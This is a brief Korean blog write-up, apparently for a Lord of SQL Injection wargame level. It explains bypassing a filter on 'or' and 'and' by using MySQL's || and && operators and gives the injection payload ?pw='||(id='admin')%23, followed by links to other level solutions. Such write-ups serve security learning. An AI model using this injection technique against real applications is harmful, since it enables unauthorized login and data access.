코드 분석
'or'과 'and' 문자열을 필터링한다
공격 기법
mysql에서는 or와 and 연산자를 ||, &&로 대체하여 사용할 수 있다.
?pw='||(id='admin')%23
'Web > Lord of Sql injection' 카테고리의 다른 글
troll 문제 풀이 (0) | 2023.09.09 |
---|---|
orge 문제 풀이 (0) | 2023.09.09 |
wolfman 문제 풀이 (0) | 2023.09.07 |
orc 문제 풀이 (0) | 2023.09.06 |
goblin 문제 풀이 (0) | 2023.09.06 |